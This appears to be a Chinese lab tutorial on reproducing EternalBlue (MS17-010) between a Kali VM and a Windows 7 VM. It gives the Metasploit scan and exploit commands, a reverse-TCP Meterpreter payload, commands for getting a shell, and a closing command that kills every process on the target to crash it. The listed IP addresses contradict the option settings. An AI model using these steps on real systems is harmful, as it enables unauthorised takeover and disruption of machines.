永恒之蓝复现

工具和环境

  • 虚拟机
    • VMware-workstation-full-16.0.0-16894299
  • 虚拟机
    • kali-linux-2020.3-vmware-amd64
      ip:172.20.10.7
    • cn_windows_7_enterprise_with_sp1_x64_dvd_u_677685
      ip:172.20.10.6

稍后靶机会放到下载站

1.检查主机间是否能ping通

2.启动msf

msfconsole

查看数据库连接

db_status

显示这个为成功:

msf > db_status
[*] postgresql connected to msf

搜索命令

search ms17_010
Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   No     MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   No     MS17-010 SMB RCE Detection
   2  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   3  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   4  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

Interact with a module by name or index, for example use 4 or use exploit/windows/smb/ms17_010_psexec

扫描*

(在已知情况下可以跳过)

use auxiliary/scanner/smb/smb_ms17_010

设置参数

set rhosts 靶机ip
set threads 20
run

攻击

use exploit/windows/smb/ms17_010_eternalblue

设置参数

set rhost 靶机ip
set payload windows/x64/meterpreter/reverse_tcp
set lhost 本机ip

查看设置

show options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         172.20.10.7      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     172.20.10.6      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

这里只看刚才设置的几项对了没

进行攻击

run
或
exploit

显示win即为成功:

[+] 172.20.10.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.20.10.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 172.20.10.7:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

此时控制台显示为:

meterpreter >

使用以下方式获得靶机控制台:

meterpreter > shell
C:\Windows\system32 >
或者:
meterpreter > execute  -H -i -f cmd.exe
C:\Windows\system32 >

蓝屏代码

taskkill /f /fi "pid ne 1"

kamuXiY